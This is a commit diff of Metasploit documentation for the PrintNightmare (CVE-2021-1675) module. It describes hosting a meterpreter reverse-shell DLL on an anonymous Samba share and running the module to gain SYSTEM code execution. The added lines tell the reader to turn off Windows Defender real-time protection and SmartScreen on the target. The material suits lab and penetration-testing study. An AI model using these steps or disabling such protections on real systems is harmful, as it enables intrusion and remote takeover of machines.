Skip to content

Commit f99438b

Browse files
Add target security settings info to the documentation
1 parent ad1df38 commit f99438b

File tree

1 file changed

+6
-2
lines changed

1 file changed

+6
-2
lines changed

documentation/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.md

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -15,14 +15,14 @@ request, resulting in remote code execution as NT AUTHORITY\SYSTEM.
1515
1. `sudo cp -pf /etc/samba/smb.conf /etc/samba/smb.conf.bak` to backup your existing config.
1616
1. `sudo mkdir /var/public`
1717
1. Add the following into the end of the `/etc/samba/smb.conf` file:
18-
18+
1919
```
2020
[public]
2121
comment = Public Directories
2222
path = /var/public
2323
guest ok = Yes
2424
```
25-
25+
2626
1. Restart Samba with `sudo service smbd restart`.
2727
1. Generate your DLL and place the file under `/var/public`.
2828
@@ -51,6 +51,10 @@ request, resulting in remote code execution as NT AUTHORITY\SYSTEM.
5151
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sudo mv /home/gwillcox/payload.dll /var/public/payload.dll
5252
```
5353
54+
1. Disable Windows security options on the target
55+
1. Disable Windows Defender Real-time protection (Windows Security > Virus & threat protection > Virus & threat protection settings)
56+
1. Disable Windows Defender SmartScreen (Windows Security > Virus & threat protection > App & browser control)
57+
5458
1. Exploit the vulnerability to force the target to load the DLL payload
5559
1. From msfconsole
5660
1. Do: `use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare`

0 commit comments

Comments
 (0)